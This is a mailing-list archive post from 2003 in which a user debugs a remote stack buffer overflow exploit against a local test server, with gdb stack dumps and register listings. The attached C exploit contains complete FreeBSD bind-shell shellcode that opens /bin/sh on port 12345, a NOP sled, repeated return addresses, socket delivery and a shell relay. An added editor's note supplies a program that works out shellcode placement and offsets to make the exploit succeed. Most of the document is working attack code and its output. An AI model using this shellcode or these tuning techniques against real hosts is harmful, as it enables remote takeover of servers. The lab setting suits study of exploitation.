Vulnerability Development mailing list archives

Re: sample buffer overflow exploit problem


From: Ganbold <ganbold () micom mng net>
Date: Wed, 01 Oct 2003 10:06:52 +0900

Hi Orlando,

I tested your modified exploit.
When I run the exploit with offset 320:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 320
scsize: 131
ret: 0xbfbffa40
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on the server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
-----------------------------------------------------------------------------------------------------------------------------
It binds a shell to port 12345. When I make a connection to it, in gdb I see the following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9d0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9d8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9e0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9e8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9f0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9f8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa00:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa08:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa10:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa18:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa20:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa28:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa30:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa38:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa40:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa48:     0x90    0x90    0x90    0x6a    0x10    0x89    0xe1    0x83
                                                     ^^^^^^ shellcode begins
0xbfbffa50:     0xec    0x10    0x89    0xe3    0x31    0xc0    0x50    0x50
0xbfbffa58:     0x50    0x66    0x68    0x30    0x39    0xb4    0x20    0x66
0xbfbffa60:     0x50    0x89    0xe2    0x6a    0x06    0x6a    0x01    0x6a
0xbfbffa68:     0x02    0x50    0x30    0xe4    0xb0    0x61    0xcd    0x80
0xbfbffa70:     0x89    0xc7    0x6a    0x10    0x52    0x50    0x50    0xb0
0xbfbffa78:     0x68    0xcd    0x80    0x31    0xc0    0x50    0x57    0x50
0xbfbffa80:     0x83    0xc0    0x6a    0xcd    0x80    0x51    0x53    0x57
0xbfbffa88:     0x50    0xb0    0x1e    0xcd    0x80    0x89    0xc3    0x31
-----------------------------------------------------------------------------------------------------------------------------
As you can see, the shellcode is not complete; I see only half of my shellcode.
So when the exploit runs, the server doesn't crash and binds the shell port. But when I make a connection to port 12345, the server crashes and the x/200bx $esp-200 command shows the above half of my shellcode.

Following is the register information after the crash:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax            0x9      9
ecx            0xbfbffaec       -1077937428
edx            0xbfbffacc       -1077937460
ebx            0x9      9
esp            0xbfbffa90       0xbfbffa90
ebp            0xbfbffa40       0xbfbffa40
esi            0xbfbffb80       -1077937280
edi            0x8      8
eip            0xbfbffa8f       0xbfbffa8f
eflags         0x10206  66054
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
st0            -nan(0x0000ca000)        (raw 0xffff00000000000ca000)
st1            -nan(0x000002000)        (raw 0xffff0000000000002000)
st2            0        (raw 0x00000000000000000000)
st3            0        (raw 0x00000000000000000000)
st4            0        (raw 0x00000000000000000000)
st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6            24       (raw 0x4003c000000000000000)
st7            60       (raw 0x4004f000000000000000)
fctrl          0x127f   4735
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
-----------------------------------------------------------------------------------------------------------------------------
But when I run the exploit with offset 0 I see a different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on the server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ?? ()
(gdb) x/300bx $esp-300
0xbfbffa48:     0x90    0x90    0x90    0x6a    0x10    0x89    0xe1    0x83
                                                     ^^^^^^ shellcode begins
0xbfbffa50:     0xec    0x10    0x89    0xe3    0x31    0xc0    0x50    0x50
0xbfbffa58:     0x50    0x66    0x68    0x30    0x39    0xb4    0x20    0x66
0xbfbffa60:     0x50    0x89    0xe2    0x6a    0x06    0x6a    0x01    0x6a
0xbfbffa68:     0x02    0x50    0x30    0xe4    0xb0    0x61    0xcd    0x80
0xbfbffa70:     0x89    0xc7    0x6a    0x10    0x52    0x50    0x50    0xb0
0xbfbffa78:     0x68    0xcd    0x80    0x31    0xc0    0x50    0x57    0x50
0xbfbffa80:     0x83    0xc0    0x6a    0xcd    0x80    0x51    0x53    0x57
0xbfbffa88:     0x50    0xb0    0x1e    0xcd    0x80    0x89    0xc3    0x31
0xbfbffa90:     0xc0    0x50    0x53    0x50    0xb0    0x5a    0xcd    0x80
0xbfbffa98:     0xb0    0x01    0x50    0x53    0x50    0x83    0xc0    0x59
0xbfbffaa0:     0xcd    0x80    0xb0    0x02    0x50    0x53    0x50    0x83
0xbfbffaa8:     0xc0    0x58    0xcd    0x80    0x31    0xc0    0x50    0x68
0xbfbffab0:     0x2f    0x2f    0x73    0x68    0x68    0x2f    0x62    0x69
0xbfbffab8:     0x6e    0x89    0xe3    0x50    0x53    0x89    0xe2    0x50
0xbfbffac0:     0x52    0x53    0x50    0xb0    0x3b    0xcd    0x80    0x31
0xbfbffac8:     0xc0    0x40    0x50    0x50    0xcd    0x80    0x90    0x90
^^^^^^ shellcode ends
0xbfbffad0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffad8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffae0:     0x90    0x90    0x90    0x90    0x80    0xfb    0xbf    0xbf
^^^^^^ return address
0xbfbffae8:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffaf0:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffaf8:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb00:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb08:     0x80    0xfb    0xbf    0x2c    0x20    0x6e    0x69    0x63
                                         ^^^^^^ ends here
0xbfbffb10:     0x65    0x20    0x74    0x6f    0x20    0x6d    0x65    0x65
0xbfbffb18:     0x74    0x20    0x79    0x6f    0x75    0x21    0x0d    0x0a
0xbfbffb20:     0x00    0x00    0x00    0x00    0x74    0x02    0x76    0xfc
0xbfbffb28:     0x00    0x00    0x00    0x00    0x41    0xc6    0x04    0x28
0xbfbffb30:     0x7e    0xf7    0x0f    0x28    0x60    0x00    0x00    0x00
0xbfbffb38:     0x10    0x00    0x00    0x00    0x07    0x00    0x00    0x00
0xbfbffb40:     0x06    0x00    0x00    0x00    0x02    0x00    0x00    0x00
0xbfbffb48:     0x6c    0xfb    0xbf    0xbf    0x6c    0xfb    0xbf    0xbf
0xbfbffb50:     0x15    0x87    0x04    0x08    0x02    0x00    0x00    0x00
0xbfbffb58:     0x74    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb60:     0x68    0xfb    0xbf    0xbf    0x00    0x00    0x00    0x00
0xbfbffb68:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffb70:     0x02    0x00    0x00    0x00
-----------------------------------------------------------------------------------------------------------------------------
As you can see, I see all my shellcode and the return address fully.
Following is the register information:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax            0xffffffff       -1
ecx            0x9      9
edx            0xffffffff       -1
ebx            0x2      2
esp            0xbfbffb74       0xbfbffb74
ebp            0xbfbffb80       0xbfbffb80
esi            0xbfbffb80       -1077937280
edi            0xbfbffcb2       -1077936974
eip            0xbfbffb8c       0xbfbffb8c
eflags         0x10246  66118
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
st0            -nan(0x0000ca000)        (raw 0xffff00000000000ca000)
st1            -nan(0x000002000)        (raw 0xffff0000000000002000)
st2            0        (raw 0x00000000000000000000)
st3            0        (raw 0x00000000000000000000)
st4            0        (raw 0x00000000000000000000)
st5            0        (raw 0x00000000000000000000)
st6            0        (raw 0x00000000000000000000)
st7            10       (raw 0x4002a000000000000000)
fctrl          0x127f   4735
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
-----------------------------------------------------------------------------------------------------------------------------
I'm very confused and I don't know yet what to do.
Please give me some advice.

thanks in advance,

Ganbold



At 01:45 PM 9/30/2003 -0500, you wrote:
attachment

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
 * FreeBSD shellcode - binds /bin/sh to a port 12345
 *
 * Claes M. Nyberg 20020619
 *
 * <cmn () darklab org>, <md0claes () mdstud chalmers se>
 */
char shellcode[] =
/* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";
#define RET 0xbfbffb80 //0xbfbffa48

/* Relay stdin to the socket and socket output to stdout, for talking to the
 * bind shell on port 12345 once it has been connected to. */
void exec_sh(int sockfd)
{
        char snd[4096], rcv[4096];
        fd_set rset;
        while (1) {
                FD_ZERO(&rset);
                FD_SET(fileno(stdin), &rset);
                FD_SET(sockfd, &rset);
                select(sockfd + 1, &rset, NULL, NULL, NULL);
                if (FD_ISSET(fileno(stdin), &rset)) {
                        memset(snd, 0, sizeof(snd));
                        if (fgets(snd, sizeof(snd), stdin) == NULL)
                                exit(0);
                        write(sockfd, snd, strlen(snd));
                }
                if (FD_ISSET(sockfd, &rset)) {
                        memset(rcv, 0, sizeof(rcv));
                        /* read one byte less so rcv stays NUL-terminated for fputs */
                        if (read(sockfd, rcv, sizeof(rcv) - 1) <= 0)
                                exit(0);
                        fputs(rcv, stdout);
                }
        }
}

int main(int argc, char *argv[])
{
        char buffer[1064];
        int s, i, size, offset;
        struct sockaddr_in remote;
        struct hostent *host;

        if (argc != 4) {
                printf("Usage: %s target-ip port offset\n", argv[0]);
                return -1;
        }
        /* "offset" holds the return address that is actually sent: RET minus argv[3] */
        offset = RET - atoi(argv[3]);

        // filling buffer with NOPs
        memset(buffer, 0x90, 1064);

        printf("scsize: %d\nret: 0x%x\n", (int)sizeof(shellcode) - 1, offset);

        // copying shellcode into buffer (last shellcode byte lands at buffer[999])
        memcpy(buffer + 1001 - sizeof(shellcode), shellcode, sizeof(shellcode) - 1);

        // Copying the return address multiple times at the end of the buffer...
        for (i = 1022; i < 1060; i += 4) {
                *((int *)&buffer[i]) = offset;
        }

        // terminator: everything from here on is not copied by the server
        buffer[1061] = 0x0;

        // getting hostname
        host = gethostbyname(argv[1]);
        if (host == NULL) {
                fprintf(stderr, "Unknown Host %s\n", argv[1]);
                return -1;
        }

        // creating socket...
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0) {
                fprintf(stderr, "Error: Socket\n");
                return -1;
        }
        memset(&remote, 0, sizeof(remote));
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(atoi(argv[2]));

        // connecting with destination host
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1) {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }

        // sending exploit string
        size = send(s, buffer, sizeof(buffer), 0);
        if (size == -1) {
                close(s);
                fprintf(stderr, "sending data failed\n");
                return -1;
        }
/*
        printf("[-] Connecting to bindshell...\n");
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(12345);
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1) {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }
        exec_sh(s);
*/
        // closing socket
        close(s);
        return 0;
}
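
Editor's note with an added example (this is not Ganbold's or Orlando's code, and the server's source is not on this page). Reading the two dumps together: in the offset-320 run esp is 0xbfbffa90 at the crash, and `x/200bx $esp-200` prints exactly the 200 bytes below esp, so that dump necessarily stops at esp rather than where the shellcode ends. The faulting eip 0xbfbffa8f sits just past the fourth `int 0x80` of the shellcode (mov al,0x1e is accept on FreeBSD), so four syscalls' worth of pushes had already happened, and they happened on a stack that starts only a few dozen bytes above the shellcode's last byte (the shellcode ends at buffer+999, the return-address slots start at buffer+1022). The program below decodes the shellcode's push/sub instructions to measure that stack footprint, recovers the frame geometry from the addresses in the dumps, reports how many shellcode bytes the shellcode's own stack writes cover before the crash, and proposes a shellcode position and `offset` argument that keep the footprint clear of the code. Assumptions, labelled in the code: the addresses 0xbfbffa4b and 0xbfbffa90 and the "fourth syscall" count are read off the gdb output above and only hold while the server's frame sits where those runs show it; the 64-byte margin is arbitrary; a little-endian host is assumed as in the original `*(int *)&buffer[i]`; and the NUL check rests on the dump showing ", nice to meet you!" copied right after buffer[1061], which suggests the server copies the input as a C string.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* FreeBSD bind-shell shellcode from the attached exploit (Claes M. Nyberg). */
static const unsigned char sc[] =
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";
#define SC_LEN   ((int)sizeof(sc) - 1)   /* 131, matches "scsize: 131" above */

/* Layout constants taken from the attached exploit. */
#define BUF_LEN  1064
#define SC_OFF   (1001 - (SC_LEN + 1))   /* buffer+1001-sizeof(shellcode) = 869 */
#define RET_BASE 0xbfbffb80u             /* #define RET; the "offset" argument is subtracted */

/* ASSUMPTIONS read off the gdb output above; valid only for that frame layout. */
#define SC_SEEN_AT     0xbfbffa4bu       /* first shellcode byte in both dumps */
#define CRASH_ESP      0xbfbffa90u       /* esp at the SIGSEGV in the offset-320 run */
#define CRASH_SYSCALLS 4                 /* eip 0xbfbffa8f is just past the 4th int 0x80 (accept) */

/* Stack bytes pushed (or reserved with sub esp) by the time the n-th int 0x80
 * returns; n == 0 walks the whole shellcode. Only the opcodes this shellcode
 * uses are decoded; any other byte makes the walk return -1. */
int stack_used(const unsigned char *p, int len, int until_syscall)
{
    int i = 0, used = 0, syscalls = 0;
    while (i < len) {
        unsigned char op = p[i], nx = i + 1 < len ? p[i + 1] : 0;
        if (op == 0x6a)                          { used += 4; i += 2; }  /* push imm8    */
        else if (op == 0x68)                     { used += 4; i += 5; }  /* push imm32   */
        else if (op >= 0x50 && op <= 0x57)       { used += 4; i += 1; }  /* push r32     */
        else if (op >= 0x40 && op <= 0x47)       { i += 1; }             /* inc r32      */
        else if (op == 0x66 && nx == 0x68)       { used += 2; i += 4; }  /* push imm16   */
        else if (op == 0x66 && nx >= 0x50 && nx <= 0x57) { used += 2; i += 2; } /* push r16 */
        else if (op == 0x83 && i + 2 < len)      { if (nx == 0xec) used += p[i + 2]; i += 3; } /* sub esp,imm8 / add eax,imm8 */
        else if (op == 0x89 || op == 0x31 || op == 0x30) { i += 2; }     /* mov/xor r/m,r */
        else if (op >= 0xb0 && op <= 0xb7)       { i += 2; }             /* mov r8,imm8  */
        else if (op == 0xcd)                     { i += 2; if (++syscalls == until_syscall) return used; } /* int imm8 */
        else return -1;
    }
    return used;
}

/* Offset (from payload start) of esp right after the overwritten return address
 * is popped: crash esp plus what the shellcode had pushed by then, minus the
 * payload base recovered from where the shellcode was seen in memory. */
int entry_esp_offset(void)
{
    uint32_t entry_esp = CRASH_ESP + (uint32_t)stack_used(sc, SC_LEN, CRASH_SYSCALLS);
    return (int)(entry_esp - (SC_SEEN_AT - SC_OFF));
}

/* Shellcode bytes overwritten when `used` stack bytes grow down from esp_off. */
int clobbered_bytes(int sc_off, int sc_len, int esp_off, int used)
{
    int a = esp_off - used > sc_off ? esp_off - used : sc_off;
    int b = esp_off < sc_off + sc_len ? esp_off : sc_off + sc_len;
    return b > a ? b - a : 0;
}

/* Highest shellcode offset that keeps the whole stack footprint, plus an
 * arbitrary 64-byte margin, below the shellcode's end. */
int safe_sc_offset(void)
{
    return entry_esp_offset() - stack_used(sc, SC_LEN, 0) - SC_LEN - 64;
}

/* "offset" argument so that RET_BASE - offset lands 8 NOPs in front of the
 * relocated shellcode, provided the frame sits where the dumps show it. */
int suggested_offset(void)
{
    uint32_t target = SC_SEEN_AT - SC_OFF + (uint32_t)safe_sc_offset() - 8;
    return (int)(RET_BASE - target);
}

/* Build the payload as the attached exploit does (little-endian host assumed,
 * like its `*(int *)&buffer[i]`) and count NUL bytes before the terminator:
 * the dump shows ", nice to meet you!" right after buffer[1061], so the server
 * appears to copy the input as a C string and any earlier NUL truncates it. */
int payload_nul_count(int sc_off, uint32_t ret)
{
    static unsigned char buf[BUF_LEN];
    int i, nuls = 0;
    memset(buf, 0x90, BUF_LEN);
    memcpy(buf + sc_off, sc, SC_LEN);
    for (i = 1022; i < 1060; i += 4) memcpy(buf + i, &ret, 4);
    buf[1061] = 0;
    for (i = 0; i < 1061; i++) nuls += (buf[i] == 0);
    return nuls;
}

int main(void)
{
    int esp = entry_esp_offset(), used = stack_used(sc, SC_LEN, CRASH_SYSCALLS);
    printf("esp on entry = payload+%d; shellcode at payload+%d..%d\n", esp, SC_OFF, SC_OFF + SC_LEN - 1);
    printf("%d bytes pushed before accept() returns -> %d shellcode bytes clobbered\n",
           used, clobbered_bytes(SC_OFF, SC_LEN, esp, used));
    printf("whole shellcode needs %d bytes: place it at payload+%d, run with offset %d (NULs: %d)\n",
           stack_used(sc, SC_LEN, 0), safe_sc_offset(), suggested_offset(),
           payload_nul_count(safe_sc_offset(), RET_BASE - (uint32_t)suggested_offset()));
    return 0;
}
```

With Orlando's constants the check reports esp entering the shellcode at payload+1034, 96 bytes pushed before accept() returns, and 62 of the 131 shellcode bytes (payload+938 to payload+999, i.e. 0xbfbffa90 upward) overwritten by the shellcode's own stack, which is exactly where the first dump's intact bytes stop. The general rule it encodes: a bind/reverse shell that builds sockaddr and argv on the stack needs its full footprint (176 bytes here) of clear space between the end of the code and the esp it inherits, so either place the shellcode that much earlier in the sled or prepend a stack adjustment; the offset argument then has to move with it so the return address still lands in NOPs in front of the code.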

